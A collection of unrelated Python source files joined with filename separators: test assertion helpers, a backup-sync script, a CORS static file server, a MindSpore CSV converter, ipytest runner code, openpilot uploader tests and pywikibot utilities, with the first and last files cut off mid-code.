def assertAllClose(self, a, b, rtol=1e-6, atol=1e-6):
"""Asserts that two numpy arrays have near values.
Args:
a: a numpy ndarray or anything can be converted to one.
b: a numpy ndarray or anything can be converted to one.
rtol: relative tolerance
atol: absolute tolerance
"""
a = self._GetNdArray(a)
b = self._GetNdArray(b)
self.assertEqual(
a.shape, b.shape,
"Shape mismatch: expected %s, got %s." % (a.shape, b.shape))
if not np.allclose(a, b, rtol=rtol, atol=atol):
# Prints more details than np.testing.assert_allclose.
#
# NOTE: numpy.allclose (and numpy.testing.assert_allclose)
# checks whether two arrays are element-wise equal within a
# tolerance. The relative difference (rtol * abs(b)) and the
# absolute difference atol are added together to compare against
# the absolute difference between a and b. Here, we want to
# print out which elements violate such conditions.
cond = np.abs(a - b) > atol + rtol * np.abs(b)
if a.ndim:
x = a[np.where(cond)]
y = b[np.where(cond)]
print "not close where = ", np.where(cond)
else:
# np.where is broken for scalars
x, y = a, b
print "not close lhs = ", x
print "not close rhs = ", y
print "not close dif = ", np.abs(x - y)
print "not close tol = ", atol + rtol * np.abs(y)
np.testing.assert_allclose(a, b, rtol=rtol, atol=atol)
def assertAllEqual(self, a, b):
"""Asserts that two numpy arrays have the same values.
Args:
a: a numpy ndarray or anything can be converted to one.
b: a numpy ndarray or anything can be converted to one.
"""
a = self._GetNdArray(a)
b = self._GetNdArray(b)
self.assertEqual(
a.shape, b.shape,
"Shape mismatch: expected %s, got %s." % (a.shape, b.shape))
same = (a == b)
if a.dtype == np.float32 or a.dtype == np.float64:
same = np.logical_or(same, np.logical_and(np.isnan(a), np.isnan(b)))
if not np.all(same):
# Prints more details than np.testing.assert_array_equal.
diff = np.logical_not(same)
if a.ndim:
x = a[np.where(diff)]
y = b[np.where(diff)]
print "not equal where = ", np.where(diff)
else:
# np.where is broken for scalars
x, y = a, b
print "not equal lhs = ", x
print "not equal rhs = ", y
np.testing.assert_array_equal(a, b)
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def assertRaisesWithPredicateMatch(self, exception_type,
expected_err_re_or_predicate):
"""Returns a context manager to enclose code expected to raise an exception.
Args:
exception_type: The expected type of exception that should be raised.
expected_err_re_or_predicate: If this is callable, it should be a function
of one argument that inspects the passed-in OpError exception and
returns True (success) or False (please fail the test). Otherwise, the
error message is expected to match this regular expression partially.
Returns:
A context manager to surround code that is expected to raise an
errors.OpError exception.
"""
if callable(expected_err_re_or_predicate):
predicate = expected_err_re_or_predicate
else:
def predicate(e):
err_str = e.message
op = e.op
while op is not None:
err_str += "\nCaused by: " + op.name
op = op._original_op
logging.info("Searching within error strings: '%s' within '%s'",
expected_err_re_or_predicate, err_str)
return re.search(expected_err_re_or_predicate, err_str)
try:
yield
self.fail(exception_type.__name__ + " not raised")
# pylint: disable=broad-except
except Exception as e:
# pylint: enable=broad-except
if not isinstance(e, exception_type) or not predicate(e):
raise AssertionError(e)
# pylint: enable=g-doc-return-or-yield
def assertRaisesOpError(self, expected_err_re_or_predicate):
return self.assertRaisesWithPredicateMatch(errors.OpError,
expected_err_re_or_predicate)
def assertShapeEqual(self, np_array, tf_tensor):
"""Asserts that a Numpy ndarray and a TensorFlow tensor have the same shape.
Args:
np_array: A Numpy ndarray or Numpy scalar.
tf_tensor: A Tensor.
Raises:
TypeError: If the arguments have the wrong type.
"""
if not isinstance(np_array, (np.ndarray, np.generic)):
raise TypeError("np_array must be a Numpy ndarray or Numpy scalar")
if not isinstance(tf_tensor, ops.Tensor):
raise TypeError("tf_tensor must be a Tensor")
self.assertAllEqual(np_array.shape, tf_tensor.get_shape().as_list())
|
main.py
|
import os
import time
import threading
from copy_files import copy_files
from delete_files import delete_files, delete_empty_folders
from results import compile_results
from utils import load_config
from multiprocessing import Pool
from tqdm import tqdm
# TODO: Fix bug that rewrites skipped and error log files on each use
# TODO: Add log folder on config
def sync(origin, target, job, cpu_cores):
walk_buffer = []
print(f'\nLoading file list for {origin} -> {target}')
for root, dirs, files in os.walk(origin):
walk_buffer.append((root, files, origin, target))
print('File list loaded.')
print('Copying files...')
pool = Pool(cpu_cores)
results = pool.starmap(copy_files, tqdm(walk_buffer, total=len(walk_buffer)), chunksize=10)
pool.close()
pool.join()
print("Done.")
compile_results(results, job)
def delete_extras(origin, target, job, cpu_cores):
walk_buffer = []
print(f'\nLoading file deletion list for {origin} -> {target}')
for root, dirs, files in os.walk(target):
walk_buffer.append((root, files, origin, target))
print('File list loaded.')
print('Deleting files...')
pool = Pool(cpu_cores)
results = pool.starmap(delete_files, tqdm(walk_buffer, total=len(walk_buffer)), chunksize=10)
pool.close()
pool.join()
print("Done.")
compile_results(results, job, delete_mode=True)
delete_empty_folders(target)
def run():
start = time.time()
config = load_config()
sys_config = config['system']
parallel_jobs = (sys_config['parallel_jobs'] == "True")
full_sync = (sys_config['full_sync'] == "True")
max_cpu_cores = int(sys_config['max_cpu_cores'])
num_of_tasks = len(config.sections()) - 1
if parallel_jobs:
cpu_cores = max_cpu_cores // num_of_tasks
else:
cpu_cores = max_cpu_cores
if parallel_jobs:
thread_list = []
for job in config.sections():
if job == 'system':
continue
bkp_obj = config[job]
job_thread = threading.Thread(target=sync, args=(bkp_obj['origin'], bkp_obj['target'], job, cpu_cores))
thread_list.append(job_thread)
if full_sync:
delete_thread = threading.Thread(target=delete_extras, args=(bkp_obj['origin'], bkp_obj['target'], job, cpu_cores))
thread_list.append(delete_thread)
for job_thread in thread_list:
job_thread.start()
for job_thread in thread_list:
job_thread.join()
else:
for job in config.sections():
if job == 'system':
continue
bkp_obj = config[job]
sync(**bkp_obj, job=job, cpu_cores=cpu_cores)
if full_sync:
delete_extras(**bkp_obj, job=job, cpu_cores=cpu_cores)
end = time.time()
minutes, seconds = divmod(end - start, 60)
print("Total time: {:0>2}:{:05.2f}".format(int(minutes), seconds))
if __name__ == '__main__':
run()
|
cors_web_server.py
|
import threading
class CORSWebServer(object):
def __init__(self) -> None:
self.thread = threading.Thread(target=self.serve)
self.server = None
def serve(self):
outer = self
from http.server import HTTPServer, SimpleHTTPRequestHandler, test
class ClojureServer(HTTPServer):
def __init__(self, *args, **kwargs):
HTTPServer.__init__(self, *args, **kwargs)
outer.server = self
class CORSRequestHandler(SimpleHTTPRequestHandler):
def end_headers(self):
self.send_header("Access-Control-Allow-Origin", "*")
SimpleHTTPRequestHandler.end_headers(self)
test(CORSRequestHandler, ClojureServer)
def start(self) -> None:
self.thread.start()
def stop(self) -> None:
if self.running:
self.server.shutdown()
self.thread.join()
@property
def running(self) -> bool:
return self.server is not None
web_server = CORSWebServer()
|
csv_to_mr.py
|
# Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""
Csv format convert tool for MindRecord.
"""
from importlib import import_module
import os
from mindspore import log as logger
from ..filewriter import FileWriter
from ..shardutils import check_filename, ExceptionThread
try:
pd = import_module("pandas")
except ModuleNotFoundError:
pd = None
__all__ = ['CsvToMR']
class CsvToMR:
"""
A class to transform from csv to MindRecord.
Args:
source (str): the file path of csv.
destination (str): the MindRecord file path to transform into.
columns_list(list[str], optional): A list of columns to be read. Default: None.
partition_number (int, optional): partition size, Default: 1.
Raises:
ValueError: If `source`, `destination`, `partition_number` is invalid.
RuntimeError: If `columns_list` is invalid.
"""
def __init__(self, source, destination, columns_list=None, partition_number=1):
if not pd:
raise Exception("Module pandas is not found, please use pip install it.")
if isinstance(source, str):
check_filename(source)
self.source = source
else:
raise ValueError("The parameter source must be str.")
self._check_columns(columns_list, "columns_list")
self.columns_list = columns_list
if isinstance(destination, str):
check_filename(destination)
self.destination = destination
else:
raise ValueError("The parameter destination must be str.")
if partition_number is not None:
if not isinstance(partition_number, int):
raise ValueError("The parameter partition_number must be int")
self.partition_number = partition_number
else:
raise ValueError("The parameter partition_number must be int")
self.writer = FileWriter(self.destination, self.partition_number)
def _check_columns(self, columns, columns_name):
"""
Validate the columns of csv
"""
if not columns:
return
if isinstance(columns, list):
for col in columns:
if not isinstance(col, str):
raise ValueError("The parameter {} must be list of str.".format(columns_name))
else:
raise ValueError("The parameter {} must be list of str.".format(columns_name))
def _get_schema(self, df):
"""
Construct schema from df columns
"""
if self.columns_list:
for col in self.columns_list:
if col not in df.columns:
raise RuntimeError("The parameter columns_list is illegal, column {} does not exist.".format(col))
else:
self.columns_list = df.columns
schema = {}
for col in self.columns_list:
if str(df[col].dtype) == 'int64':
schema[col] = {"type": "int64"}
elif str(df[col].dtype) == 'float64':
schema[col] = {"type": "float64"}
elif str(df[col].dtype) == 'bool':
schema[col] = {"type": "int32"}
else:
schema[col] = {"type": "string"}
if not schema:
raise RuntimeError("Failed to generate schema from csv file.")
return schema
def _get_row_of_csv(self, df, columns_list):
"""Get row data from csv file."""
for _, r in df.iterrows():
row = {}
for col in columns_list:
if str(df[col].dtype) == 'bool':
row[col] = int(r[col])
else:
row[col] = r[col]
yield row
def run(self):
"""
Execute transformation from csv to MindRecord.
Returns:
MSRStatus, whether csv is successfully transformed to MindRecord.
"""
if not os.path.exists(self.source):
raise IOError("Csv file {} do not exist.".format(self.source))
pd.set_option('display.max_columns', None)
df = pd.read_csv(self.source)
csv_schema = self._get_schema(df)
logger.info("transformed MindRecord schema is: {}".format(csv_schema))
# set the header size
self.writer.set_header_size(1 << 24)
# set the page size
self.writer.set_page_size(1 << 26)
# create the schema
self.writer.add_schema(csv_schema, "csv_schema")
# add the index
self.writer.add_index(list(self.columns_list))
csv_iter = self._get_row_of_csv(df, self.columns_list)
batch_size = 256
transform_count = 0
while True:
data_list = []
try:
for _ in range(batch_size):
data_list.append(csv_iter.__next__())
transform_count += 1
self.writer.write_raw_data(data_list)
logger.info("transformed {} record...".format(transform_count))
except StopIteration:
if data_list:
self.writer.write_raw_data(data_list)
logger.info(
"transformed {} record...".format(transform_count))
break
ret = self.writer.commit()
return ret
def transform(self):
"""
Encapsulate the run function to exit normally
"""
t = ExceptionThread(target=self.run)
t.daemon = True
t.start()
t.join()
if t.exitcode != 0:
raise t.exception
return t.res
|
_impl.py
|
from __future__ import print_function, division, absolute_import
import ast
import contextlib
import fnmatch
import importlib
import pathlib
import shlex
import sys
import tempfile
import threading
import packaging.version
import pytest
from IPython import get_ipython
from ._config import current_config
def run(*args, module=None, plugins=()):
"""Execute all tests in the passed module (defaults to __main__) with pytest.
:param args:
additional commandline options passed to pytest
:param module:
the module containing the tests. If not given, `__main__` will be used.
:param filename:
the filename of the file containing the tests. It has to be a real
file, e.g., a notebook name, since itts existence will be checked by
pytest. If not given, the `__file__` attribute of the passed module
will be used.
:param plugins:
additional plugins passed to pytest.
"""
import ipytest
run = run_in_thread if current_config["run_in_thread"] else run_direct
ipytest.exit_code = run(
_run_impl,
*args,
module=module,
plugins=plugins,
)
def run_pytest_clean(line, cell):
"""IPython magic function running pytest after cleaning the tests"""
clean_tests()
get_ipython().run_cell(cell)
run(*shlex.split(line))
def run_pytest(line, cell):
"""IPython magic function running pytest"""
get_ipython().run_cell(cell)
run(*shlex.split(line))
def clean_tests(pattern=None, items=None):
"""Delete tests with names matching the given pattern.
In IPython the results of all evaluations are kept in global variables
unless explicitly deleted. This behavior implies that when tests are renamed
the previous definitions will still be found if not deleted. This method
aims to simply this process.
An effecitve pattern is to start with the cell containing tests with a call
to `clean_tests`, then defined all test cases, and finally call `run_tests`.
This way renaming tests works as expected.
**Arguments:**
- `pattern`: a glob pattern used to match the tests to delete.
- `items`: the globals object containing the tests. If `None` is given, the
globals object is determined from the call stack.
"""
if items is None:
import __main__
items = vars(__main__)
if pattern is None:
pattern = current_config["clean"]
to_delete = [key for key in items.keys() if fnmatch.fnmatchcase(key, pattern)]
for key in to_delete:
del items[key]
def reload(*mods):
"""Reload all modules passed as strings.
This function may be useful, when mixing code in external modules and
notebooks.
Usage::
reload("ipytest._util", "ipytest")
"""
for mod in mods:
importlib.reload(importlib.import_module(mod))
def _run_impl(*args, module, plugins):
with _prepared_module(module) as filename:
full_args = _build_full_args(args, filename)
return pytest.main(full_args, plugins=plugins)
def _build_full_args(args, filename):
def _fmt(arg):
return arg.format(MODULE=filename)
return [
*(_fmt(arg) for arg in current_config["addopts"]),
*(_fmt(arg) for arg in args),
*([filename] if current_config["defopts"] else []),
]
@contextlib.contextmanager
def _prepared_module(module):
if module is None: # pragma: no cover
import __main__ as module
with tempfile.NamedTemporaryFile(dir=".", suffix=".py") as f:
path = pathlib.Path(f.name)
module_name = path.stem
if not is_valid_module_name(module_name):
raise RuntimeError(
f"Invalid module name {module_name!r} generated by tempfile. "
"This should not happen, please open an issue at "
"'https://github.com/chmp/ipytest/issues' to report a bug."
)
if module_name in sys.modules:
raise RuntimeError(
f"Cannot register module with name {module_name!r}. It would "
"override and existing module. Consider not setting __file__ "
"inside the notebook. This way a random module name will be generated."
)
with patch(module, "__file__", str(path)):
with register_module(module, module_name):
yield str(path)
class RewriteAssertTransformer(ast.NodeTransformer):
def register_with_shell(self, shell):
shell.ast_transformers.append(self)
def unregister_with_shell(self, shell):
shell.ast_transformers[:] = [
transformer
for transformer in shell.ast_transformers
if transformer is not self
]
def visit(self, node):
from _pytest.assertion.rewrite import rewrite_asserts
pytest_version = get_pytest_version()
if pytest_version.release[0] >= 5:
# TODO: re-create a pseudo code to include the asserts?
rewrite_asserts(node, b"")
else:
rewrite_asserts(node)
return node
def get_pytest_version():
return packaging.version.parse(pytest.__version__)
@contextlib.contextmanager
def patch(obj, attr, val):
had_attr = hasattr(obj, attr)
prev_val = getattr(obj, attr, None)
setattr(obj, attr, val)
try:
yield
finally:
if not had_attr:
delattr(obj, attr)
else:
setattr(obj, attr, prev_val)
@contextlib.contextmanager
def register_module(obj, name):
if name in sys.modules:
raise RuntimeError(f"Cannot overwrite existing module {name}")
sys.modules[name] = obj
try:
yield
finally:
del sys.modules[name]
def run_direct(func, *args, **kwargs):
return func(*args, **kwargs)
def run_in_thread(func, *args, **kwargs):
res = None
def _thread():
nonlocal res
res = func(*args, **kwargs)
t = threading.Thread(target=_thread)
t.start()
t.join()
return res
def is_valid_module_name(name):
return all(c not in name for c in ".- ")
|
test_uploader.py
|
import time
import threading
import unittest
import logging
import json
from selfdrive.swaglog import cloudlog
import selfdrive.loggerd.uploader as uploader
from common.xattr import getxattr
from selfdrive.loggerd.tests.loggerd_tests_common import UploaderTestCase
class TestLogHandler(logging.Handler):
def __init__(self):
logging.Handler.__init__(self)
self.reset()
def reset(self):
self.upload_order = list()
self.upload_ignored = list()
def emit(self, record):
try:
j = json.loads(record.message)
if j["event"] == "upload_success":
self.upload_order.append(j["key"])
if j["event"] == "upload_ignored":
self.upload_ignored.append(j["key"])
except Exception:
pass
log_handler = TestLogHandler()
cloudlog.addHandler(log_handler)
class TestUploader(UploaderTestCase):
def setUp(self):
super(TestUploader, self).setUp()
log_handler.reset()
def tearDown(self):
super(TestUploader, self).tearDown()
def start_thread(self):
self.end_event = threading.Event()
self.up_thread = threading.Thread(target=uploader.uploader_fn, args=[self.end_event])
self.up_thread.daemon = True
self.up_thread.start()
def join_thread(self):
self.end_event.set()
self.up_thread.join()
def gen_files(self, lock=False):
f_paths = list()
for t in ["bootlog.bz2", "qlog.bz2", "rlog.bz2", "dcamera.hevc", "fcamera.hevc"]:
f_paths.append(self.make_file_with_data(self.seg_dir, t, 1, lock=lock))
return f_paths
def gen_order(self, seg1, seg2):
keys = [f"{self.seg_format.format(i)}/qlog.bz2" for i in seg1]
keys += [f"{self.seg_format2.format(i)}/qlog.bz2" for i in seg2]
for i in seg1:
keys += [f"{self.seg_format.format(i)}/{f}" for f in ['rlog.bz2', 'fcamera.hevc', 'dcamera.hevc']]
for i in seg2:
keys += [f"{self.seg_format2.format(i)}/{f}" for f in ['rlog.bz2', 'fcamera.hevc', 'dcamera.hevc']]
keys += [f"{self.seg_format.format(i)}/bootlog.bz2" for i in seg1]
keys += [f"{self.seg_format2.format(i)}/bootlog.bz2" for i in seg2]
return keys
def test_upload(self):
f_paths = self.gen_files(lock=False)
self.start_thread()
# allow enough time that files could upload twice if there is a bug in the logic
time.sleep(5)
self.join_thread()
self.assertTrue(len(log_handler.upload_ignored) == 0, "Some files were ignored")
self.assertFalse(len(log_handler.upload_order) < len(f_paths), "Some files failed to upload")
self.assertFalse(len(log_handler.upload_order) > len(f_paths), "Some files were uploaded twice")
for f_path in f_paths:
self.assertTrue(getxattr(f_path, uploader.UPLOAD_ATTR_NAME), "All files not uploaded")
exp_order = self.gen_order([self.seg_num], [])
self.assertTrue(log_handler.upload_order == exp_order, "Files uploaded in wrong order")
def test_upload_ignored(self):
self.set_ignore()
f_paths = self.gen_files(lock=False)
self.start_thread()
# allow enough time that files could upload twice if there is a bug in the logic
time.sleep(5)
self.join_thread()
self.assertTrue(len(log_handler.upload_order) == 0, "Some files were not ignored")
self.assertFalse(len(log_handler.upload_ignored) < len(f_paths), "Some files failed to ignore")
self.assertFalse(len(log_handler.upload_ignored) > len(f_paths), "Some files were ignored twice")
for f_path in f_paths:
self.assertTrue(getxattr(f_path, uploader.UPLOAD_ATTR_NAME), "All files not ignored")
exp_order = self.gen_order([self.seg_num], [])
self.assertTrue(log_handler.upload_ignored == exp_order, "Files ignored in wrong order")
def test_upload_files_in_create_order(self):
f_paths = list()
seg1_nums = [0, 1, 2, 10, 20]
for i in seg1_nums:
self.seg_dir = self.seg_format.format(i)
f_paths += self.gen_files()
seg2_nums = [5, 50, 51]
for i in seg2_nums:
self.seg_dir = self.seg_format2.format(i)
f_paths += self.gen_files()
self.start_thread()
# allow enough time that files could upload twice if there is a bug in the logic
time.sleep(5)
self.join_thread()
self.assertTrue(len(log_handler.upload_ignored) == 0, "Some files were ignored")
self.assertFalse(len(log_handler.upload_order) < len(f_paths), "Some files failed to upload")
self.assertFalse(len(log_handler.upload_order) > len(f_paths), "Some files were uploaded twice")
for f_path in f_paths:
self.assertTrue(getxattr(f_path, uploader.UPLOAD_ATTR_NAME), "All files not uploaded")
exp_order = self.gen_order(seg1_nums, seg2_nums)
self.assertTrue(log_handler.upload_order == exp_order, "Files uploaded in wrong order")
def test_no_upload_with_lock_file(self):
f_paths = self.gen_files(lock=True)
self.start_thread()
# allow enough time that files should have been uploaded if they would be uploaded
time.sleep(5)
self.join_thread()
for f_path in f_paths:
self.assertFalse(getxattr(f_path, uploader.UPLOAD_ATTR_NAME), "File upload when locked")
if __name__ == "__main__":
unittest.main()
|
__init__.py
|
"""Miscellaneous helper functions (not wiki-dependent)."""
#
# (C) Pywikibot team, 2008-2020
#
# Distributed under the terms of the MIT license.
#
import collections
import gzip
import hashlib
import inspect
import itertools
import os
import queue
import re
import stat
import subprocess
import sys
import threading
import time
import types
from collections.abc import Iterator, Mapping
from contextlib import suppress
from datetime import datetime
from distutils.version import LooseVersion, Version
from functools import wraps
from importlib import import_module
from inspect import getfullargspec
from ipaddress import ip_address
from itertools import zip_longest
from typing import Optional
from warnings import catch_warnings, showwarning, warn
from pywikibot.logging import debug
from pywikibot.tools._unidata import _first_upper_exception
try:
import bz2
except ImportError as bz2_import_error:
try:
import bz2file as bz2
warn('package bz2 was not found; using bz2file', ImportWarning)
except ImportError:
warn('package bz2 and bz2file were not found', ImportWarning)
bz2 = bz2_import_error
try:
import lzma
except ImportError as lzma_import_error:
lzma = lzma_import_error
PYTHON_VERSION = sys.version_info[:3]
_logger = 'tools'
class _NotImplementedWarning(RuntimeWarning):
"""Feature that is no longer implemented."""
pass
def is_IP(IP: str) -> bool: # noqa N802, N803
"""Verify the IP address provided is valid.
No logging is performed. Use ip_address instead to catch errors.
@param IP: IP address
"""
with suppress(ValueError):
ip_address(IP)
return True
return False
def has_module(module, version=None):
"""Check whether a module can be imported."""
try:
m = import_module(module)
except ImportError:
pass
else:
if version is None:
return True
try:
module_version = LooseVersion(m.__version__)
except AttributeError:
pass
else:
if module_version >= LooseVersion(version):
return True
else:
warn('Module version {} is lower than requested version {}'
.format(module_version, version), ImportWarning)
return False
def empty_iterator():
# http://stackoverflow.com/a/13243870/473890
"""An iterator which does nothing."""
return
yield
class classproperty: # noqa: N801
"""
Descriptor class to access a class method as a property.
This class may be used as a decorator::
class Foo:
_bar = 'baz' # a class property
@classproperty
def bar(cls): # a class property method
return cls._bar
Foo.bar gives 'baz'.
"""
def __init__(self, cls_method):
"""Hold the class method."""
self.method = cls_method
self.__doc__ = self.method.__doc__
def __get__(self, instance, owner):
"""Get the attribute of the owner class by its method."""
return self.method(owner)
class suppress_warnings(catch_warnings): # noqa: N801
"""A decorator/context manager that temporarily suppresses warnings.
Those suppressed warnings that do not match the parameters will be raised
shown upon exit.
"""
def __init__(self, message='', category=Warning, filename=''):
"""Initialize the object.
The parameter semantics are similar to those of
`warnings.filterwarnings`.
@param message: A string containing a regular expression that the start
of the warning message must match. (case-insensitive)
@type message: str
@param category: A class (a subclass of Warning) of which the warning
category must be a subclass in order to match.
@type category: type
@param filename: A string containing a regular expression that the
start of the path to the warning module must match.
(case-sensitive)
@type filename: str
"""
self.message_match = re.compile(message, re.I).match
self.category = category
self.filename_match = re.compile(filename).match
super().__init__(record=True)
def __enter__(self):
"""Catch all warnings and store them in `self.log`."""
self.log = super().__enter__()
def __exit__(self, exc_type, exc_val, exc_tb):
"""Stop logging warnings and show those that do not match to params."""
super().__exit__(exc_type, exc_val, exc_tb)
for warning in self.log:
if (
not issubclass(warning.category, self.category)
or not self.message_match(str(warning.message))
or not self.filename_match(warning.filename)
):
showwarning(
warning.message, warning.category, warning.filename,
warning.lineno, warning.file, warning.line)
def __call__(self, func):
"""Decorate func to suppress warnings."""
@wraps(func)
def suppressed_func(*args, **kwargs):
with self:
return func(*args, **kwargs)
return suppressed_func
# From http://python3porting.com/preparing.html
class ComparableMixin:
"""Mixin class to allow comparing to other objects which are comparable."""
def __lt__(self, other):
"""Compare if self is less than other."""
return other > self._cmpkey()
def __le__(self, other):
"""Compare if self is less equals other."""
return other >= self._cmpkey()
def __eq__(self, other):
"""Compare if self is equal to other."""
return other == self._cmpkey()
def __ge__(self, other):
"""Compare if self is greater equals other."""
return other <= self._cmpkey()
def __gt__(self, other):
"""Compare if self is greater than other."""
return other < self._cmpkey()
def __ne__(self, other):
"""Compare if self is not equal to other."""
return other != self._cmpkey()
class DotReadableDict:
"""Parent class of Revision() and FileInfo().
Provide: __getitem__() and __repr__().
"""
def __getitem__(self, key):
"""Give access to class values by key.
Revision class may also give access to its values by keys
e.g. revid parameter may be assigned by revision['revid']
as well as revision.revid. This makes formatting strings with
% operator easier.
"""
return getattr(self, key)
def __repr__(self):
"""Return a more complete string representation."""
return repr(self.__dict__)
class _FrozenDict(dict):
"""
Frozen dict, preventing write after initialisation.
Raises TypeError if write attempted.
"""
def __init__(self, data=None, error: Optional[str] = None):
"""
Initializer.
@param data: mapping to freeze
@type data: mapping
@param error: error message
"""
if data:
args = [data]
else:
args = []
super().__init__(*args)
self._error = error or 'FrozenDict: not writable'
def update(self, *args, **kwargs):
"""Prevent updates."""
raise TypeError(self._error)
__setitem__ = update
class frozenmap(Mapping): # noqa: N801
"""Frozen mapping, preventing write after initialisation."""
def __init__(self, data=(), **kwargs):
"""Initialize data in same ways like a dict."""
self.__data = {}
if isinstance(data, Mapping):
for key in data:
self.__data[key] = data[key]
elif hasattr(data, 'keys'):
for key in data.keys():
self.__data[key] = data[key]
else:
for key, value in data:
self.__data[key] = value
for key, value in kwargs.items():
self.__data[key] = value
def __getitem__(self, key):
return self.__data[key]
def __iter__(self):
return iter(self.__data)
def __len__(self):
return len(self.__data)
def __repr__(self):
return '{}({!r})'.format(self.__class__.__name__, self.__data)
class LazyRegex:
"""
Regex object that obtains and compiles the regex on usage.
Instances behave like the object created using L{re.compile}.
"""
def __init__(self, pattern, flags=0):
"""
Initializer.
@param pattern: L{re} regex pattern
@type pattern: str or callable
@param flags: L{re.compile} flags
@type flags: int
"""
self.raw = pattern
self.flags = flags
super().__init__()
@property
def raw(self):
"""The raw property."""
if callable(self._raw):
self._raw = self._raw()
return self._raw
@raw.setter
def raw(self, value):
self._raw = value
self._compiled = None
@property
def flags(self):
"""The flags property."""
return self._flags
@flags.setter
def flags(self, value):
self._flags = value
self._compiled = None
def __getattr__(self, attr):
"""Compile the regex and delegate all attribute to the regex."""
if self._raw:
if not self._compiled:
self._compiled = re.compile(self.raw, self.flags)
if hasattr(self._compiled, attr):
return getattr(self._compiled, attr)
raise AttributeError('%s: attr %s not recognised'
% (self.__class__.__name__, attr))
else:
raise AttributeError('%s.raw not set' % self.__class__.__name__)
class DeprecatedRegex(LazyRegex):
"""Regex object that issues a deprecation notice."""
def __init__(self, pattern, flags=0, name=None, instead=None, since=None):
"""
Initializer.
If name is None, the regex pattern will be used as part of
the deprecation warning.
@param name: name of the object that is deprecated
@type name: str or None
@param instead: if provided, will be used to specify the replacement
of the deprecated name
@type instead: str
"""
super().__init__(pattern, flags)
self._name = name or self.raw
self._instead = instead
self._since = since
def __getattr__(self, attr):
"""Issue deprecation warning."""
issue_deprecation_warning(
self._name, self._instead, warning_class=FutureWarning,
since=self._since)
return super().__getattr__(attr)
def first_lower(string: str) -> str:
"""
Return a string with the first character uncapitalized.
Empty strings are supported. The original string is not changed.
"""
return string[:1].lower() + string[1:]
def first_upper(string: str) -> str:
"""
Return a string with the first character capitalized.
Empty strings are supported. The original string is not changed.
@note: MediaWiki doesn't capitalize some characters the same way as Python.
This function tries to be close to MediaWiki's capitalize function in
title.php. See T179115 and T200357.
"""
first = string[:1]
return (_first_upper_exception(first) or first.upper()) + string[1:]
def normalize_username(username) -> Optional[str]:
"""Normalize the username."""
if not username:
return None
username = re.sub('[_ ]+', ' ', username).strip()
return first_upper(username)
class MediaWikiVersion(Version):
"""
Version object to allow comparing 'wmf' versions with normal ones.
The version mainly consist of digits separated by periods. After that is a
suffix which may only be 'wmf<number>', 'alpha', 'beta<number>' or
'-rc.<number>' (the - and . are optional). They are considered from old to
new in that order with a version number without suffix is considered the
newest. This secondary difference is stored in an internal _dev_version
attribute.
Two versions are equal if their normal version and dev version are equal. A
version is greater if the normal version or dev version is greater. For
example:
1.24 < 1.24.1 < 1.25wmf1 < 1.25alpha < 1.25beta1 < 1.25beta2
< 1.25-rc-1 < 1.25-rc.2 < 1.25
Any other suffixes are considered invalid.
"""
MEDIAWIKI_VERSION = re.compile(
r'(\d+(?:\.\d+)+)(-?wmf\.?(\d+)|alpha|beta(\d+)|-?rc\.?(\d+)|.*)?$')
@classmethod
def from_generator(cls, generator):
"""Create instance using the generator string."""
if not generator.startswith('MediaWiki '):
raise ValueError('Generator string ({!r}) must start with '
'"MediaWiki "'.format(generator))
return cls(generator[len('MediaWiki '):])
def parse(self, vstring):
"""Parse version string."""
version_match = MediaWikiVersion.MEDIAWIKI_VERSION.match(vstring)
if not version_match:
raise ValueError('Invalid version number "{}"'.format(vstring))
components = [int(n) for n in version_match.group(1).split('.')]
# The _dev_version numbering scheme might change. E.g. if a stage
# between 'alpha' and 'beta' is added, 'beta', 'rc' and stable releases
# are reassigned (beta=3, rc=4, stable=5).
if version_match.group(3): # wmf version
self._dev_version = (0, int(version_match.group(3)))
elif version_match.group(4):
self._dev_version = (2, int(version_match.group(4)))
elif version_match.group(5):
self._dev_version = (3, int(version_match.group(5)))
elif version_match.group(2) in ('alpha', '-alpha'):
self._dev_version = (1, )
else:
for handled in ('wmf', 'alpha', 'beta', 'rc'):
# if any of those pops up here our parser has failed
assert handled not in version_match.group(2), \
'Found "{}" in "{}"'.format(handled,
version_match.group(2))
if version_match.group(2):
debug('Additional unused version part '
'"{}"'.format(version_match.group(2)),
_logger)
self._dev_version = (4, )
self.suffix = version_match.group(2) or ''
self.version = tuple(components)
def __str__(self):
"""Return version number with optional suffix."""
return '.'.join(str(v) for v in self.version) + self.suffix
def _cmp(self, other):
if isinstance(other, str):
other = MediaWikiVersion(other)
if self.version > other.version:
return 1
if self.version < other.version:
return -1
if self._dev_version > other._dev_version:
return 1
if self._dev_version < other._dev_version:
return -1
return 0
class ThreadedGenerator(threading.Thread):
"""Look-ahead generator class.
Runs a generator in a separate thread and queues the results; can
be called like a regular generator.
Subclasses should override self.generator, I{not} self.run
Important: the generator thread will stop itself if the generator's
internal queue is exhausted; but, if the calling program does not use
all the generated values, it must call the generator's stop() method to
stop the background thread. Example usage:
>>> gen = ThreadedGenerator(target=range, args=(20,))
>>> try:
... data = list(gen)
... finally:
... gen.stop()
>>> data
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19]
"""
def __init__(self, group=None, target=None, name='GeneratorThread',
args=(), kwargs=None, qsize=65536):
"""Initializer. Takes same keyword arguments as threading.Thread.
target must be a generator function (or other callable that returns
an iterable object).
@param qsize: The size of the lookahead queue. The larger the qsize,
the more values will be computed in advance of use (which can eat
up memory and processor time).
@type qsize: int
"""
if kwargs is None:
kwargs = {}
if target:
self.generator = target
if not hasattr(self, 'generator'):
raise RuntimeError('No generator for ThreadedGenerator to run.')
self.args, self.kwargs = args, kwargs
super().__init__(group=group, name=name)
self.queue = queue.Queue(qsize)
self.finished = threading.Event()
def __iter__(self):
"""Iterate results from the queue."""
if not self.is_alive() and not self.finished.isSet():
self.start()
# if there is an item in the queue, yield it, otherwise wait
while not self.finished.isSet():
try:
yield self.queue.get(True, 0.25)
except queue.Empty:
pass
except KeyboardInterrupt:
self.stop()
def stop(self):
"""Stop the background thread."""
self.finished.set()
def run(self):
